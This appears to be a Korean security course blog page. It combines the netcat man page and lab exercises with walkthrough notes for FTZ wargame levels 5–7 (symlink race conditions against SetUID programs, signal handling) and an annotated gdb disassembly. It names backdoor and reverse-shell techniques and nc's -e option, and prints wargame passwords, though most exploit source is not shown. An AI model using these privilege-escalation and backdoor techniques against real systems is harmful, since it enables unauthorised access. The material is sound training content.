22Hz

nc(netcat) 명령어 사용법

NAME

nc - arbitrary TCP and UDP connections and listens

SYNOPSIS

nc [-46DdhklnrStUuvz] [-i interval] [-p source_port]

[-s source_ip_address] [-T ToS] [-w timeout]

[-X proxy_protocol] [-x proxy_address[:port]]

[hostname] [port[s]]

DESCRIPTION

The nc (or netcat) utility is used for just about anything

under the sun involving TCP or UDP. It can open TCP con-

nections, send UDP packets, listen on arbitrary TCP and

UDP ports, do port scanning, and deal with both IPv4 and

IPv6. Unlike telnet(1), nc scripts nicely, and separates

error messages onto standard error instead of sending them

to standard output, as telnet(1) does with some.

Common uses include:

? simple TCP proxies

? shell-script based HTTP clients and servers

? network daemon testing

? a SOCKS or HTTP ProxyCommand for ssh(1)

? and much, much more

The options are as follows:

-l Used to specify that nc should listen for an

incoming connection rather than initiate a connec-

tion to a remote host. It is an error to use this

option in conjunction with the -p, -s, or -z

options. Additionally, any timeouts specified

with the -w option are ignored.

-u Use UDP instead of the default option of TCP.

CLIENT/SERVER MODEL

It is quite simple to build a very basic client/server

model using nc. On one console, start nc listening on a

specific port for a connection. For example:

(nc server) $ nc -l 1234

nc is now listening on port 1234 for a connection. On a

second console (or a second machine), connect to the

machine and port being listened on:

(nc client) $ nc 127.0.0.1 1234

There should now be a connection between the ports. Any-

thing typed at the second console will be concatenated to

the first, and vice-versa. After the connection has been

set up, nc does not really care which side is being used

as a 'server' and which side is being used as a 'client'.

The connection may be terminated using an EOF ('^D').

DATA TRANSFER

The example in the previous section can be expanded to

build a basic data transfer model. Any information input

into one end of the connection will be output to the other

end, and input and output can be easily captured in order

to emulate file transfer.

Start by using nc to listen on a specific port, with out-

put captured into a file:

$ nc -l 1234 > filename.out

Using a second machine, connect to the listening nc pro-

cess, feeding it the file which is to be transferred:

$ nc host.example.com 1234 < filename.in

After the file has been transferred, the connection will

close automatically.

TALKING TO SERVERS

It is sometimes useful to talk to servers "by hand" rather

than through a user interface. It can aid in trou-

bleshooting, when it might be necessary to verify what

data a server is sending in response to commands issued by

the client. For example, to retrieve the home page of a

web site:

$ echo -n "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80

Note that this also displays the headers sent by the web

server. They can be filtered, using a tool such as

sed(1), if necessary.

More complicated examples can be built up when the user

knows the format of requests required by the server. As

another example, an email may be submitted to an SMTP

server using:

$ nc localhost 25 << EOF

HELO host.example.com

MAIL FROM: <user@host.example.com>

RCPT TO: <user2@host.example.com>

DATA

Body of email.

.

QUIT

EOF

PORT SCANNING

It may be useful to know which ports are open and running

services on a target machine. The -z flag can be used to

tell nc to report open ports, rather than initiate a con-

nection. For example:

$ nc -z host.example.com 20-30

Connection to host.example.com 22 port [tcp/ssh] succeeded!

Connection to host.example.com 25 port [tcp/smtp] succeeded!

The port range was specified to limit the search to ports

20 - 30.

Alternatively, it might be useful to know which server

software is running, and which versions. This information

is often contained within the greeting banners. In order

to retrieve these, it is necessary to first make a connec-

tion, and then break the connection when the banner has

been retrieved. This can be accomplished by specifying a

small timeout with the -w flag, or perhaps by issuing a

"QUIT" command to the server:

$ echo "QUIT" | nc host.example.com 20-30

SSH-1.99-OpenSSH_3.6.1p2

Protocol mismatch.

220 host.example.com IMS SMTP Receiver Version 0.84 Ready

EXAMPLES

Open a TCP connection to port 42 of host.example.com,

using port 31337 as the source port, with a timeout of 5

seconds:

$ nc -p 31337 -w 5 host.example.com 42

Open a UDP connection to port 53 of host.example.com:

$ nc -u host.example.com 53

Open a TCP connection to port 42 of host.example.com using

10.1.2.3 as the IP for the local end of the connection:

$ nc -s 10.1.2.3 host.example.com 42

Create and listen on a Unix Domain Socket:

$ nc -lU /var/tmp/dsocket

Connect to port 42 of host.example.com via an HTTP proxy

at 10.2.3.4, port 8080. This example could also be used

by ssh(1); see the ProxyCommand directive in ssh_config(5)

for more information.

$ nc -x10.2.3.4:8080 -Xconnect host.example.com 42

넷캣(Netcat)은 TCP나 UDP 프로토콜을 사용하는 네트워크 연결에서 데이터를 읽고 쓰는 간단한 유틸리티 프로그램이다. 일반적으로는 UNIX의 cat과 비슷한 사용법을 가지고 있지만 cat이 파일에 쓰거나 읽듯이 nc는 network connection에 읽거나 쓴다. 이것은 스크립트와 병용하여 network에 대한 debugging, testing tool로써 매우 편리하지만 반면 해킹에도 이용범위가 넓다.

Netcat(이하 nc로 표기)은 Network connection 에서 raw-data read, write를 할수 있는 유틸리티 프로그램입니다. 일반적으로는 UNIX의 cat과 비슷한 사용법을 가지고 있지만 cat이 파일에 쓰거나 읽듯이 nc는 네트워크에 읽거나 쓸수 있습니다. 이것은 스크립트와 병용하여 network에 대한 debugging, testing tool로써 매우 편리하고, 원하는 포트로 원하는 데이터를 주고받을수 있는 특징때문에 해킹에도 널리 이용되며, 컴퓨터 포렌식에 있어서 라이브시스템의 데이터를 손상없이 가져오기위해서도 사용될수 있습니다.

nc은 원하는 거의 모든 종류의 접속형태를 만들어 낼 수 있고 흥미로운 몇 가지 내장기능을 갖고 있기 때문에 다기능의 네크워크 문제해결/조사시 유용하게 사용가능합니다.

■ 프로그램 다운로드

(리눅스용 nc) http://netcat.sourceforge.net/

(윈도우용 nc) http://www.securityfocus.com/tools/139/scoreit

■ nc 최신버전에 대한 사용법

----------------------------------------------------------------------------------------------

usage : nc [options] [target host] [ports]

-n : 호스트 네임과 포트를 숫자로만 입력받는다.

-v : verbosity 를 증가 시킨다. 더 많은 정보를 얻을수 있다.

-o [filename]: 보내거나 받은 데이터를 헥스덤프하여 파일에 저장한다.

-u : TCP connection 대신에 UDP connection 이 이루어 진다.

-p [port number or name] : local-port 를 지정한다. 주로 -l 과 같이 사용하게 된다.

-s [ip address or DNS] : local ip address 를 지정한다. 모든 플렛폼에서 지원되지는 않는다.

-l : listen 모드로 nc을 띠우게 된다. 당연히 target host는 입력하지 않는다. -p와 같이 사용하게 된다. nc를 server 로서 쓸때 사용.

-e [filename] : -DGAPING_SECURITY_HOLE 옵션으로 Make 되었을 때 사용가능하다.

-t : -DTELNET 옵션으로 컴파일 되었을 때 사용가능하다. telnetd에 접속이 가능하도록 접속시 telnet과 같은 협상과정을 거친다.

-i [interval time] : nc는 일반적으로 8K 씩 데이터를 보내고 받는데 그렇게 Standard input의 한 라인씩 interval time마다 보내게 된다.

-z : connection을 이루기위한 최소한의 데이터 외에는 보내지 않도록 하는 옵션.

-r : port 지정이 여러개로 되어 있으면 이때 scanning 순서를 randomize하고 (일반적으로 범위로 지정하면 높은 번호의 포트부터 스캔한다) 또한 -p 옵션에서 지정가능한 local port도 randomize 합니다. 이때 주의 할 것은 -p가 -r을 override 한다는 것입니다.

----------------------------------------------------------------------------------------------

[실습] netcat 명령어 설치

(linux200)

# yum -y install nc

-> 출력내용 생략

# rpm -qa | grep nc

[실습] 간단한 네트워크 연결

# nc 192.168.10.200 22 (# telnet localhost 22)

[실습] 서비스 배너 수집

# echo -e "HEAD / HTTP/1.0\n\n" | nc httpd.apache.org 80

# echo -e "HEAD / HTTP/1.0\n\n" | nc localhost 80

-> 위 결과를 보면 웹 서버 소프트웨어와 운영체제를 알 수 있다.

[실습] 간단한 서버/클라이언트 구성

포트 7979에서 리슨(listen)하는 간단한 채팅 서버를 만들어 보자.

(nc server) 192.168.10.200

[TERM1] # nc -l 7979

(nc client) 192.168.10.200

[TERM2] # nc 192.168.10.200 7979 (# telnet 192.168.10.200 7979)

hi

hello netcat!!!!

<CTRL + D>

-> 클라이언트에서 입력한 모든 문자가 서버에 출력된다.

-> 간단한 채팅 서버를 만든 셈이다.

-> 클라이언트에서 <CTRL + D> 통해 끊을 때 서버도 같이 종료 된다.

-> connection 이 이루어 졌을 때 파일을 실행시킨다. -l 과 같이 사용되면 한 instance만을 사용하

는 inetd와 비슷하다.

[실습] 파일 전송

클라이언트에서 명령의 결과를 바로 서버 측으로 전송하거나 파일을 전송할 수 있다.

클라이언트에서 넷캣 리스너로 파일을 전송할 수도 있고 역방향으로 파일을 전송할 수도 있다.

(nc server) [TERM1] # nc -l 7979 > /tmp/output.txt

(nc client) [TERM2] # ps auxf | nc 192.168.10.200 7979

or

# nc 192.168.10.200 < /tmp/input.txt

(nc server) [TERM1] # cat /tmp/output.txt

[참고] 참고 사이트(반드시 참고한다.)

http://devanix.tistory.com/307-> 백도어 쉘과 리버스 셀 부분을 참고한다.

https://www.linux.co.kr/home/lecture/?leccode=10648

http://1828.tistory.com/entry/Tool-NC-NetCat

http://egloos.zum.com/hanguy/v/2079313

http://idkwim.tistory.com/58

http://security.kaist.ac.kr/docs/netcat.html

http://www.oac.uci.edu/indiv/franklin/doc/netcat.html

■ 백도어 쉘(bind_tcp)

■ 리버스 쉘(reverse_tcp)

(linux200)

[참고] nc(netcat)명령어 사용법

# yum -y install nc

# rpm -qa | grep nc

# nc 192.168.10.240 79 /* 192.168.10.240 : HackMe System's IP */

#

(HackMe)

# man bash

-i If the -i option is present, the shell is

interactive.

[level4@ftz tmp]$ cd ~/tmp

[level4@ftz tmp]$ vi backdoor2.c

[level4@ftz tmp]$ gcc -o backdoor backdoor2.c

[level4@ftz tmp]$

(linux200)

# nc 192.168.10.240 79

#

(정리) xinetd 방식의 원격 백도어 특성

서비스 요청이 있지 않으면 데몬이 떠 있지 않은 상태이므로 관리자가 확인하기가 어렵다.

단원의 목적

레이스 컨디션(Race Condition, 경쟁상태/경쟁조건)

레이스 컨디션(Race Condition)

다수의 프로세스가 서로 동일한 자원을 할당받기 위해 경쟁하는 상태이다.

레이스 컨디션(Race Condition)의 전제조건

다른 계정의 권한에 접근해야 하므로 SetUID가 걸려 있어야 한다.

임시 파일을 생성해야 한다.

공격자가 임시로 생성되는 파일명을 정확하게 알아야 한다.

레이스 컨디션이 발생하는 경우의 예

(일반적인 프로그램 실행시)

① 파일생성

② 생성된 파일에 내용쓰기

③ 쓴 내용을 읽어들여 처리/사용

④ 파일 삭제

level6 문제에 도전하기

level5 사용자로 로그인

-> ID/PASS: level5/what is your name?

[level5@ftz level5]$ ls -l

[level5@ftz level5]$ cat hint

[level5@ftz level5]$ ls -l /usr/bin/level5

[level5@ftz level5]$ find / -user level6 -perm -4000 2>/dev/null

[level5@ftz level5]$ /usr/bin/level5 ; ls -l /tmp/level5.tmp

-> 파일이 빨리 생성 되었다가 지워지기 때문에 없는것 처럼 보인다.

[level5@ftz level5]$ cd tmp

[level5@ftz tmp]$ vi runTarget.c

[level5@ftz tmp]$ gcc -o runTarget runTarget.c

[level5@ftz tmp]$

[참고] ln 명령어에 대해서

ln 명령어에 대해서

■ 파일의 종류

일반 파일(Regular File)

디렉토리 파일(Directory File)

링크 파일(Link File)

하드 링크 파일(Hard Link File)

심볼릭 링크 파일(Symbolic Link File, Soft Link File)

디바이스 파일(Device File)

블럭 디바이스 파일(Block Device File)

캐릭터 디바이스 파일(Character Device File = Raw Device File)

파이프 파일(Pipe File)

소켓 파일(Socket File)

도어 파일(Door File)

■ 링크 파일(Link File) 파일의 종류

- 하드 링크(Hard Link)

- 심볼릭 링크(Symbolic Link, Soft Link)

■ 하드링크에 대한 기본 체계

# ls -l file1

-rw-r--r-- 1 root root 6 8월 25 13:06 file1

(linux200)

파일에 대한 하드링크 수는 '1'이 기본값이다.

디렉토리에 대한 하드링크 수는 '2'가 기본값이다.-> 디렉토리안에 들어 있는 디렉토리의 개수

# cd /test && rm -rf /test/*

# echo "hello" > file1

# ls -l file1

+----------------+

file1 | Inode | Inode(Index Node)

+----------------+

| |

| Data |

| |

| |

+----------------+

# mkdir dir1

# ls -ld dir1

디렉토리에 대한 하드링크수는 디렉토리 안에 들어 있는 디렉토리 개수이다.

# ls -al dir1

# mkdir dir1/dir2

# ls -ld dir1

-> 디렉토리의 하드링수는?

-> drwxr-xr-x 3 root root 4.0K Jul 7 02:58 dir1

# mkdir dir1/dir3

# ls -ld dir1

-> 디렉토리의 하드링수는?

-> drwxr-xr-x 4 root root 4.0K Jul 7 02:59 dir1

# mkdir dir1/dir2/dir4

# ls -ld dir1

-> 디렉토리의 하드링수는?

-> drwxr-xr-x 4 root root 4.0K Jul 7 02:59 dir1

# touch dir1/file2

# ls -ld dir1

-> 디렉토리의 하드링수는?

-> drwxr-xr-x 4 root root 4.0K Jul 7 03:01 dir1

# ls -l /

drwxr-xr-x 14 root root 4.0K Oct 9 04:03 lib/

■ ln 명령어 사용법

ln CMD

(하드링크) # ln file1 file2

(심볼릭 링크) # ln -s file1 file2

(하드 링크)

# cd /test && rm -rf /test/*

# echo 1111 > file1

# ls -l file1

# ln file1 file2

# ls -l file*

# ls -li file*

# echo 2222 >> file1

# cat file2

# rm file1

# cat file2

# ls -l file2

(심볼릭 링크)

# ln -s file2 file3

# ls -l file*

# ls -li file*

# echo 3333 >> file3

# cat file2

# rm file2

# cat file3

■ 심볼릭 링크의 예제

심볼릭 링크 -> 바탕화면 바로가기 아이콘(EX: 한글.lnk)

■ 하드링크 & 심볼릭 링크의 비교

-> 파일시스템을 넘어서 링크를 걸때

-> 디렉토리에 링크 걸때

■ 하드링크 검색 방법

# cd /test && rm -rf /test

# echo 1111 > file1

# ln file1 file2

# ln file1 file3

# ls -li file*

# find . -inum <inode number> -type f (EX: # find . -inum 450 -type f)

■ 하드링크의 용량 변화에 대해서

요청:

# df -h /boot

# cd /boot

# dd if=/dev/zero of=file1 bs=1M count=20

# ls -lh

# ln file1 file2

# ln file1 file3

# ls -lh file*

# df -h /boot

# rm -f file1

# df -h /boot

# rm -f file2

# df -h /boot

# rm -f file3

# df -h /boot

■ 기존에 존재파일에 링크를 거는 경우의 에러 메세지

# cd /test && rm -rf /test/*

# echo 1111 > file1

# echo 2222 > file2

# ls

# ln -s file1 file2

or

[level5@ftz tmp]$ vi Attack_Target.c

[level5@ftz tmp]$ gcc -o Attack_Target Attack_Target.c

[level5@ftz tmp]$

[level5@ftz tmp]$ vi Attack_Target.sh

[level5@ftz tmp]$ chmod 755 Attack_Target.sh

[level5@ftz tmp]$ ./Attack_Target.sh

■ 레벨5의 레이스 컨디션 공격 타이밍 예제

-------------------------- Attack_Target.sh -------------------------------------

Attack_Target process runTarget process

(ㄱ) 프로그램 실행 (ㄱ) 프로그램 실행

(ㄴ) 파일 생성(/tmp/18pass.txt)

|

+---------> (ㄷ)링크 파일 생성 <--- (ㄴ) 파일을 생성할려고 하지만 미리 만들어져 있음

(/tmp/level5.tmp)

(ㄷ) 파일에 내용 추가

(ㄹ) 파일 내용 확인(/tmp/level5.tmp)

(ㅁ) 파일 삭제(EX: rm -f /tmp/18pass.txt) (ㄹ) 파일 삭제(EX: rm -f /tmp/level5.tmp)

(ㅂ) 프로그램 종료 (ㅁ) 프로그램 종료

■ thread를 사용하여 좀 더 공격방법을 진화 시켜 보자.

[참고] Process & Thread 대해서

[level5@ftz tmp]$ vi Attack_Target2.c

[참고] 프로그램이 어떻게 동작하는지 분석하기 위해서 printf() 함수를 각 라인에 붙여서 프로그램을 동작을 시키면 좀더 효과적으로 분석할 수 있다.

[level5@ftz tmp]$ su - root

root 사용자의 암호 입력

[root@ftz root]# rm -f /tmp/18pass.txt /tmp/level5.tmp

[root@ftz root]# exit

[level5@ftz tmp]$ gcc -o Attack_Target Attack_Target2.c -pthread

[level5@ftz tmp]$ ./Attack_Target

[level5@ftz tmp]$ telnet localhost

level6/what the hell

<CTRL + ]>

telnet> quit

[level5@ftz tmp]$

[level5@ftz tmp]$ cd /tmp

[level5@ftz tmp]$ ls -l

[level5@ftz tmp]$ cat 18pass.txt

■ 리버싱을 통한 의사 코드 복원

[level5@ftz tmp]$ ls -l /usr/bin/level5

-> 실행만 할 수 있기 때문 gdb로 디버깅할 수 없다.

-> 따라서, level6 권한을 따낸후에 디버깅 작업을 해야 한다.

-> 실습에서는 root 사용자로 작업한다.

[level5@ftz level5]$ su root

[root@ftz level5]$ gdb /usr/bin/level5

■ 복원된 의사 코드이다.

# vi level5.c

■ 원본 소스 코드

# vi level5.c

■ 다른 방법을 통한 문제 풀이(http://inhack.org/wordpress/?p=1968)

원본 내용을 되도록 손상시키지 않는 범위내에서 문서를 작성하였습니다.

level5 사용자로 로그인

-> level5/what is your name?

[level5@ftz tmp]$ su - root

root 사용자의 암호 입력

[root@ftz root]# rm -f /tmp/18pass.txt /tmp/level5.tmp /tmp/level6

[root@ftz root]# exit

[level5@ftz level5]$ cd ~/tmp

[level5@ftz tmp]$ vi racecon1.c

[level5@ftz tmp]$ vi racecon2.c

[level5@ftz tmp]$ vi racecon3.c

[level5@ftz tmp]$ gcc -o racecon1 racecon1.c

[level5@ftz tmp]$ gcc -o racecon2 racecon2.c

[level5@ftz tmp]$ gcc -o racecon3 racecon3.c

[level5@ftz tmp]$ ./racecon1 & ./racecon2 2>/dev/null & ./racecon3 2>/dev/null

[level5@ftz tmp]$ pgrep -lf racecon

[level5@ftz tmp]$ pgrep racecon

[level5@ftz tmp]$ kill -9 `pgrep racecon`

단원의 목적

signal() 함수의 취약점

■ 시그널(signal)?

하나의 프로세스(Process)가 다른프로세스(Process)에게 보내는 비동기적 알림 이벤트 메세지

# kill [-1|-2|-9|-15] PID PID

■ signal 종류

-------+-------------+--------------------+-------------------------------------------

number | name | comment | example

-------+-------------+--------------------+-------------------------------------------

1 SIGHUP HangUp signal, process restart # kill -1 PID

2 SIGINT Interrupt signal # kill -2 PID

9 SIGKILL force signal # kill -9 PID

15 SIGTERM termination # kill -15 PID

--------------------------------------------------------------------------------------

[참고] signal에 대해서

시그널(signal)에 대해서

■ 시그널에 대한 정보 확인

(linux200)

# whatis signal

# man 7 signal

# kill -l

# cd /usr/include

# find . -name signal.h -type f

# cat /usr/include/asm/signal.h

■ 시그널 함수(signal())

# man signal (# man 2 singal)

시그널 함수 사용법

-----------------------------------------------------------------------------------------

함수 사용법 함수 사용예 설명

-----------------------------------------------------------------------------------------

signal(시그널번호, SIG_DFL) signal(SIGINT, SIG_DFL) SIGINT 시그널 실행

signal(시그널번호, SIG_IGN) signal(SIGQUIT, SIG_IGN) SIGQUIT 시그널 무시

signal(시그널번호, handler함수) signal(SIGINT, handler) SIGINT(CTRL + C)가 입력되면

handler() 함수를 실행

-----------------------------------------------------------------------------------------

(linux200)

시그널(signal)?

하나의 프로세스가 다른프로세에게 보내는 비동기적 알림 이벤트 메세지

# kill [-1 | -2 | -9 | -15] PID PID

signal 종류

----------------------------------

1 SIGHUP HangUp signal, process restart # kill -1 PID (# kill -HUP PID)

2 SIGINT Interrupt signal # kill -2 PID (# kill -INT PID)

9 SIGKILL force signal # kill -9 PID (# kill -KILL PID)

15 SIGTERM termination(default) # kill -15 PID(# kill -TERM PID)

----------------------------------

[실습] signal(-1/-9/-15) 간단한 실습

# pgrep -lf sendmail

# kill -15 4462 (# kill -TERM 4462)

# pgrep -lf sendmail

# service sendmail restart

# pgrep -lf sendmail

# kill -9 11130 (# kill -KILL 11130)

# pgrep -lf sendmail

# service sendmail restart

# pgrep -lf sendmail

# kill -1 11200

# pgrep -lf sendmail

[실습] signal() 함수 사용법

# cd /test && rm -rf /test/*

# vi signal.c

# gcc -o signal signal.c

# ./signal

<CTRL + C>

received 2

<CTRL + \>

received 3

<CTRL + C>

# ./signal

<CTRL + C>

received 2

<CTRL + \>

received 3

<CTRL + Z>

received 20

<CTRL + C>

# ./signal

<CTRL + Z>

received 20

<CTRL + C>

received 2

<CTRL + \>

received 3

<CTRL + C>

# stty -a (# stty --all)

Level 7 도전해 보기

level6 사용자로 로그인

-> ID/PASS: level6/what the hell

-> 잠시 기다리면 접속이 끊어진다.(약 20초 정도)

level6 사용자로 새로 로그인

-> ID/PASS: level6/what the hell

-> 잠시 기다리면 접속이 끊어진다.(약 20초 정도)

level6 사용자로 새로 로그인

-> ID/PASS: level6/what the hell

-> 잠시 기다리면 접속이 끊어진다.(약 20초 정도)

(windows) 원본 운영체제

<CTRL + ESC> => "cmd"

-> 인터넷의 발전으로 PC 통신 BBS 서비스는 페지 되었다.

BBS 화면은 가짜 모듈에 해당한다. 이 메뉴를 우회할 수 있는 뭔가가 있을 것이다.

대신 우회할 수 있는 시점이 어디인가가 중요하다.

우회할 수 있는 시점을 확인하기 위해서 수많은 시그널을 무작위로 입력해 본다.

level6 사용자로 새로 로그인

-> ID/PASS: level6/what the hell

-> 접속이 끊어진다.

level6 사용자로 새로 로그인

-> ID/PASS: level6/what the hell

-> 접속이 끊어진다.

-> 시그널 처리가 되어 있다는 것을 알수 있다.

-> ( ? ) 그럼 어떻게 로그인하자마자 프로그램이 실행 된것일까?

level6 사용자로 새로 로그인

-> ID/PASS: level6/what the hell

[level6@ftz level6]$ id

[level6@ftz level6]$ my-pass

[level6@ftz level6]$ ls -al

[level6@ftz level6]$ cat hint

[level6@ftz level6]$ file tn

[level6@ftz level6]$ cat .bashrc

[level6@ftz level6]$ cat password

사용자 로그인 ---> 환경파일(.bashrc(./tn)) ---> tn 프로그램 실행(번호) ---> 천리안(telnet)

의사 코드를 생성해 보자.

level6 사용자로 로그인

[level6@ftz level6]$ id

[level6@ftz level6]$ ls -l

[level6@ftz level6]$ gdb tn

■ 복원된 의사코드이다.

# vi tn.c

■ 원본 소스 코드

# vi tn.c

단원의 목적

암호학에 대해서(2진수 <-> 10진수 <-> 16진수)

printf() 함수를 사용할 때 메모리에 2진수로 값이 저장되어 있지만 사람이 이해하기 쉽도록 하기 위해서 %c를 지정하면 한글자가 보이고, %d로 지정하면 모니터에 정수가 출력된다.

반대로 사용자가 메모리에 원하는 문자를 저장하려면 아스키 테이블을 보고, 그 문자에 해당하는 16진수 값을 저장해야 한다.

Level 8 문제에 도전하기

level7 사용자로 로그인

-> ID/PASS: level7/come together

---------------------------- 실습을 위한 준비 ------------------------------

[level7@ftz level7]$ su root

[level7@ftz level7]$ cat << EOF >> /bin/wrong.txt

올바르지 않은 패스워드 입니다.

패스워드는 가까운곳에...

--_--_- --____- ---_-__ --__-_-

EOF

[level7@ftz level7]$ cat /bin/wrong.txt

[level7@ftz level7]$ exit

---------------------------- 실습을 위한 준비 ------------------------------

[level7@ftz level7]$ ls -l

[level7@ftz level7]$ cat hint

[level7@ftz level7]$ find / -name level7 2>/dev/null

[level7@ftz level7]$ find / -user level8 -perm -4000 2>/dev/null

[level7@ftz level7]$ ls -l /bin/level7

[level7@ftz level7]$ /bin/level7

[level7@ftz level7]$ /bin/level7

-------------------------------------------------------------------------

구분 표기 예 아스키문자열

-------------------------------------------------------------------------

2진수(Bin): 1101101 1100001 1110100 1100101 ?

10진수(Dec): 109 97 116 101 mate

16진수(Hex): 6d 61 74 65 mate

-------------------------------------------------------------------------

[level7@ftz level7]$ export LANG=C

[level7@ftz level7]$ man ascii

[level7@ftz level7]$ /bin/level7

■ 리버싱을 통한 의사 코드(가상 코드) 복원

의사코드(가상코드)란? 리버싱을 통해 원본 소스코드를 복원한 코드이다. 소스코드를 복원할 때 배열의 크기나 조건

문이 switch문으로 되어 있는지, if 문으로 되어 있는지에 대한 정확한 복원은 아니고 이런 부분에 대한 단순 복원

코드이다. 따라서 원본 코드와는 약간 다를수 있다.

    [참고] 어셈플리 언어에 대해서
    [참고] gdb 사용법

■ 프로그램 분석 방법(EX: 프로그램 실행시 분석 유무)
- 정적 분석
- 동적 분석

■ 프로그램 분석 방법(EX: 소스 코드 존재 유무)
- 블랙 박스 기법
- 화이트 박스 기법


[level1@ftz level1]$ gdb /bin/ExecuteMe

GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) disassemble main
Dump of assembler code for function main:
0x08048488 <main+0>:    push   %ebp        /* main 함수로 진입하기 전에 EBP(메모리 구조)의
                    주소를 스택에 저장 */
0x08048489 <main+1>:    mov    %esp,%ebp   /* 현재의 스택 포인터(ESP)를 스택의 베이스 포인
                    터(EBP)에 저장 */
0x0804848b <main+3>:    sub    $0x28,%esp        /* main() 함수에서 사용할 변수의 공간
0x0804848e <main+6>:    and    $0xfffffff0,%esp    을 확보 */
0x08048491 <main+9>:    mov    $0x0,%eax
0x08048496 <main+14>:   sub    %eax,%esp
0x08048498 <main+16>:   sub    $0xc,%esp
0x0804849b <main+19>:   push   $0x8048680
0x080484a0 <main+24>:   call   0x8048358 <system>    /* int system(const char *string); */
0x080484a5 <main+29>:   add    $0x10,%esp
0x080484a8 <main+32>:   sub    $0xc,%esp
0x080484ab <main+35>:   push   $0x804868f
0x080484b0 <main+40>:   call   0x8048378 <chdir>    /* int chdir(const char *path); */
0x080484b5 <main+45>:   add    $0x10,%esp
0x080484b8 <main+48>:   sub    $0xc,%esp
0x080484bb <main+51>:   push   $0x80486a0
0x080484c0 <main+56>:   call   0x80483a8 <printf>    /* int printf(const char *format,
                        ...); */
0x080484c5 <main+61>:   add    $0x10,%esp
0x080484c8 <main+64>:   sub    $0xc,%esp
0x080484cb <main+67>:   push   $0x80486e0
0x080484d0 <main+72>:   call   0x80483a8 <printf>
0x080484d5 <main+77>:   add    $0x10,%esp
0x080484d8 <main+80>:   sub    $0xc,%esp
0x080484db <main+83>:   push   $0x8048720
0x080484e0 <main+88>:   call   0x80483a8 <printf>
0x080484e5 <main+93>:   add    $0x10,%esp
0x080484e8 <main+96>:   sub    $0xc,%esp
0x080484eb <main+99>:   push   $0x8048760
0x080484f0 <main+104>:  call   0x80483a8 <printf>
---Type <return> to continue, or q <return> to quit---
0x080484f5 <main+109>:  add    $0x10,%esp
0x080484f8 <main+112>:  sub    $0xc,%esp
0x080484fb <main+115>:  push   $0x8048782
0x08048500 <main+120>:  call   0x80483a8 <printf>
0x08048505 <main+125>:  add    $0x10,%esp
0x08048508 <main+128>:  sub    $0x4,%esp
0x0804850b <main+131>:  pushl  0x8049948
0x08048511 <main+137>:  push   $0x1e    /* 0x1e = (10진수) 16 + 14 = 30 */
0x08048513 <main+139>:  lea    0xffffffd8(%ebp),%eax
0x08048516 <main+142>:  push   %eax
0x08048517 <main+143>:  call   0x8048368 <fgets>    /* char *fgets(char *s, int size,
                        FILE *stream); */
0x0804851c <main+148>:  add    $0x10,%esp
0x0804851f <main+151>:  lea    0xffffffd8(%ebp),%eax
0x08048522 <main+154>:  sub    $0x8,%esp
0x08048525 <main+157>:  push   $0x804879c
0x0804852a <main+162>:  push   %eax
0x0804852b <main+163>:  call   0x8048388 <strstr>    /* char *strstr(const char *haystack,
                        const char *needle); */
0x08048530 <main+168>:  add    $0x10,%esp
0x08048533 <main+171>:  test   %eax,%eax
0x08048535 <main+173>:  je     0x8048551 <main+201>
0x08048537 <main+175>:  sub    $0xc,%esp
0x0804853a <main+178>:  push   $0x80487c0
0x0804853f <main+183>:  call   0x80483a8 <printf>
0x08048544 <main+188>:  add    $0x10,%esp
0x08048547 <main+191>:  sub    $0xc,%esp
0x0804854a <main+194>:  push   $0x0
0x0804854c <main+196>:  call   0x80483c8 <exit>
0x08048551 <main+201>:  lea    0xffffffd8(%ebp),%eax
0x08048554 <main+204>:  sub    $0x8,%esp
0x08048557 <main+207>:  push   $0x80487e8
---Type <return> to continue, or q <return> to quit---
0x0804855c <main+212>:  push   %eax
0x0804855d <main+213>:  call   0x8048388 <strstr>
0x08048562 <main+218>:  add    $0x10,%esp
0x08048565 <main+221>:  test   %eax,%eax
0x08048567 <main+223>:  je     0x8048583 <main+251>
0x08048569 <main+225>:  sub    $0xc,%esp
0x0804856c <main+228>:  push   $0x8048800
0x08048571 <main+233>:  call   0x80483a8 <printf>
0x08048576 <main+238>:  add    $0x10,%esp
0x08048579 <main+241>:  sub    $0xc,%esp
0x0804857c <main+244>:  push   $0x0
0x0804857e <main+246>:  call   0x80483c8 <exit>
0x08048583 <main+251>:  sub    $0xc,%esp
0x08048586 <main+254>:  push   $0x8048826
0x0804858b <main+259>:  call   0x80483a8 <printf>
0x08048590 <main+264>:  add    $0x10,%esp
0x08048593 <main+267>:  sub    $0x8,%esp
0x08048596 <main+270>:  push   $0xbba    /* 0xbba = (10진수) 3002 */
0x0804859b <main+275>:  push   $0xbba    /* 0xbba = (10진수) 3002 */
0x080485a0 <main+280>:  call   0x80483b8 <setreuid>    /* int setreuid(uid_t ruid, uid_t
                        euid); */
0x080485a5 <main+285>:  add    $0x10,%esp
0x080485a8 <main+288>:  sub    $0xc,%esp
0x080485ab <main+291>:  lea    0xffffffd8(%ebp),%eax
0x080485ae <main+294>:  push   %eax
0x080485af <main+295>:  call   0x8048358 <system>
0x080485b4 <main+300>:  add    $0x10,%esp
0x080485b7 <main+303>:  leave
0x080485b8 <main+304>:  ret
0x080485b9 <main+305>:  nop
0x080485ba <main+306>:  nop
---Type <return> to continue, or q <return> to quit---
0x080485bb <main+307>:  nop
End of assembler dump.
(gdb) x/s 0x8048680
0x8048680 <_IO_stdin_used+28>:   "/usr/bin/clear"
(gdb) x/s 0x804868f
0x804868f <_IO_stdin_used+43>:   "/home/level2"
(gdb) x/s 0x80486e0
0x80486e0 <_IO_stdin_used+124>:  "\t\t한가지 실행시켜 드리겠습니다.\n"
(gdb) x/s 0x8048720
0x8048720 <_IO_stdin_used+188>:  "\t\t(단, my-pass 와 chmod는 제외)\n"
(gdb) x/s 0x8048760
0x8048760 <_IO_stdin_used+252>:  "\n\t\t어떤 명령을 실행시키겠습니까?\n"
(gdb) x/s 0x8048782
0x8048782 <_IO_stdin_used+286>:  "\n\n\t\t[level2@ftz level2]$ "
(gdb) x/s 0x8049948
0x8049948 <stdin@@GLIBC_2.0>:    ""
(gdb) x/s 0x804879c
0x804879c <_IO_stdin_used+312>:  "my-pass"
(gdb) x/s 0x80487c0
